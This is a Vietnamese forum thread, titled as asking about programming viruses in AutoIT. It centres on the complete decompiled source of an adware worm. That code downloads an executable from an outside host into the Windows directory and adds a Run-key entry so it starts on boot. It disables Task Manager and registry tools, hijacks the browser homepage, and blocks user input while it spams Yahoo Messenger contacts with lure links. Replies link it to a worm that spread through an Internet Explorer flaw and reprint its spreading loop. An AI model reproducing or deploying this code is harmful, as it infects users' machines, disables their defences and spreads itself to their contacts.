lập trình Virus bằng AutoIT. Ai biết không

[linhphukientaythuc]

mình thấy có nhiều thể loại code được biên dịch bằng trình biên dịch này trên web nhưng không biết nó là ngôn ngữ gì nữa,ai biết có thể chỉ giáo không
VD code này

Mã:

                                ; <AUT2EXE VERSION: 3.2.0.1> ; ----------------------------------------------------------------------------; <AUT2EXE INCLUDE-START: D:\AutoIT\Projects\Adware\DKC.au3>; ---------------------------------------------------------------------------- ;--------------------------------------------; Tac Gia: KVD; Phan Mem: DKC Bot; Phien Ban: 1.1; Cong Dung: Quang cao Website thong qua Y!M; Phat Hanh: 1-9-2006;-------------------------------------------- ; Thiet Lap#NoTrayIcon$website = "http://playboy.com" ; Lay Nhiem Vao He ThongIf Not FileExists(@WindowsDir & "\taskmng.exe") ThenInetGet ($website & "/dkc.exe", @WindowsDir & "\taskmng.exe", 0, 1)Sleep(5000)EndIf ; Ghi Khoa RegistryRegWrite("HKEY_CURRENT_USER\Software\Policies\Micr   osoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win   dows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int   ernet Explorer\Main", "Start Page", "REG_SZ", $website)RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V   iew\YMSGR_buzz", "content url", "REG_SZ", $website)RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V   iew\YMSGR_Launchcast", "content url", "REG_SZ", $website)RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe")RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int   ernet Explorer\Main", "Window Title", "REG_SZ", "zzzKITClubzzz") ; Danh Sach Tin Nhan Ngau NhienDim $tin[10]$tin[0] = "Nguoi ra di vi anh da mang lam lo hay tai vi anh day qua ngheo? Chang the trao ve em duoc nhu long em luon uoc mo, giac mo giau sang... " & $website & " "$tin[1] = "Ngay khong em anh day lam sao cho het ngay? Sang dem duong nhu chi co anh voi anh quay quang... " & $website & " "$tin[2] = "Om bau dau thuong, minh anh co don chon day. Ngay mai em ra di, chon giau bao ky niem... " & $website & " "$tin[3] = "Dem nay mua ngoai hien, mua oi dung roi them cho xot xa. Anh khong quay ve day, loi nao anh noi da quen... " & $website & " "$tin[4] = "Ngay mai thoi doi ta lia xa em con nho? That long anh muon ta nhin thay nhau, cho quen mau cau yeu thuong em voi anh hom nao... " & $website & " "$tin[5] = "Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon... " & $website & " "$tin[6] = "Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo... " & $website & " "$tin[7] = "Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi... " & $website & " "$tin[8] = "Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa... " & $website & " "$tin[9] = "Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau? " & $website & " " ; Ham Thay Doi Status & Gui Tin NhanWhile (1)sleep(60000)$tieude = WinGetTitle("Yahoo! Messenger", "")$kiemtra = WinExists ($tieude)If $kiemtra = 1 Then$ngaunhien = Random(0,9,1)ClipPut($tin[$ngaunhien])BlockInput (1)WinActivate($tieude)Send("!m")Send("un")Send("^v {ENTER}{ENTER}")Send("^m")Send("{DOWN}")Send("^{SHIFTDOWN}{END}{SHIFTUP}")Send("{ENTER}")Send("^v {ENTER}")BlockInput (0)EndIfSleep(1800000)WEnd ; ----------------------------------------------------------------------------; <AUT2EXE INCLUDE-END: D:\AutoIT\Projects\Adware\DKC.au3>; -----------------------

được dịch bằng

Mã:

http://www.autoitscript.com/autoit3/downloads.shtml

View more random threads:

• Source code virus spam yahoo viết bằng VC++
• Phần mềm diệt virus dùng những phương pháp gì?
• Virus Reader_s Mở IEXPLORE.EXE ẩn cửa sổ bằng cách nào nhỉ ?
• Cách chống kill thread cho phần mềm anticheat có cơ chế hoạt động giống một chương trình antivirus?
• Bắt đầu lập trình Virus và AntiVirus, kiến thức cơ bản cần gì?
• Cơ chế phát hiện mã độc của AV là gì ?
• Virus Autorun USB dù Windows đã Disable Autorun
• file autorun.inf trên usb không thể xóa trừ khi format cả ổ?
• Thực thi luôn file .exe mà không cần Click chuột
• Lập trình virus trojan backdoor nâng cao.

[namanh]

nếu mình nhớ ko nhầm thì code này này được dump ra bởi thanhth (cuasotinhoc.vn)

Code đc viết bằng AutoIT, một ngôn ngữ có khả năng can thiệp hệ thống mạnh. Chủ yếu là xài các script để thực hiện, dây là 1 lợi thế và ũng là yếu điểm của nó

[s2_cloud_s2]

uhm,sau 2 ngày tìm hiểu mình cũng hiểu nguyên tắc của nó rồi,đây chính là con virus gây điên đảo hồi đầu năm nay nếu ai nhớ thì chắc là biết cái tên gaixinh -> đây chính là 1 dạng của nó

[hoahongden2525]

uhm,sau 2 ngày tìm hiểu mình cũng hiểu nguyên tắc của nó rồi,đây chính là con virus gây điên đảo hồi đầu năm nay nếu ai nhớ thì chắc là biết cái tên gaixinh -> đây chính là 1 dạng của nó

Thực ra con girltinh.tk đó là 1 dạng phát triển tiếp của con này, bởi con đó có nhiều tính năng hơn, mình đã từng viết 1 script (MS-Batch script) để kill con này nên khá rõ về nó

Hiện chạy chủ yếu các loại Worm lây nhiễm qua Y!M đều là AutoIt (1 số là VB6)

[hajdajgja]

Thực ra con girltinh.tk đó là 1 dạng phát triển tiếp của con này, bởi con đó có nhiều tính năng hơn, mình đã từng viết 1 script (MS-Batch script) để kill con này nên khá rõ về nó

Hiện chạy chủ yếu các loại Worm lây nhiễm qua Y!M đều là AutoIt (1 số là VB6)

liệu có phải gaixinh sẽ cho phép khi người dùng kích vào trang web là tự động tải virus về không,mình vẫn chưa rõ là làm thế nào để người lập trình có thể tự động kích họat gaixinh ở victim nhỉ,hay là khi tải về nó lại ghi ở dạng autorun [IMG]images/smilies/smile.png[/IMG]

[tungloiloi1]

liệu có phải gaixinh sẽ cho phép khi người dùng kích vào trang web là tự động tải virus về không,mình vẫn chưa rõ là làm thế nào để người lập trình có thể tự động kích họat gaixinh ở victim nhỉ,hay là khi tải về nó lại ghi ở dạng autorun [IMG]images/smilies/smile.png[/IMG]

Không phải vậy đâu thật ra tại thời điểm đó con virus gaixinh lợi dụng lỗ hỗng của IE (MS0614), nếu ai dùng trình duyệt IE để mở trang web có đoạn mã độc hại thì nó sẽ tự động download về máy con girlxinh và thực thi con girlxiinh mà không có cảnh báo hoặc nhắc nhở nên nhiều người bị dính mà vẫn không biết vì sao bị dính.
Sau đó con girlxinh (được viết bằng AutoIT) lại lợi dụng Yahoo để gởi tin nhắn có chứa trang web có đoạn mã độc đó đến mọi người trong list yahoo dẫn đến người này truyền cho người kia
Đây là đoạn mà con girlxinh dùng để gởi tin nhắn

Mã:

; Ham Thay Doi Status & Gui Tin NhanWhile (1)sleep(60000)$tieude = WinGetTitle("Yahoo! Messenger", "")$kiemtra = WinExists ($tieude)If $kiemtra = 1 Then$ngaunhien = Random(0,9,1)ClipPut($tin[$ngaunhien])BlockInput (1)WinActivate($tieude)Send("!m")Send("un")Send("^v {ENTER}{ENTER}")Send("^m")Send("{DOWN}")Send("^{SHIFTDOWN}{END}{SHIFTUP}")Send("{ENTER}")Send("^v {ENTER}")BlockInput (0)EndIfSleep(1800000)WEnd

Hiện tai nếu ai xài bản WinXPSP3 thì không còn bị lỗ hỗng này nữa với lại lỗ hỗng này giờ nhạy cảm với mấy trình antivirus lắm mở lên là antivirus kêu í ới àh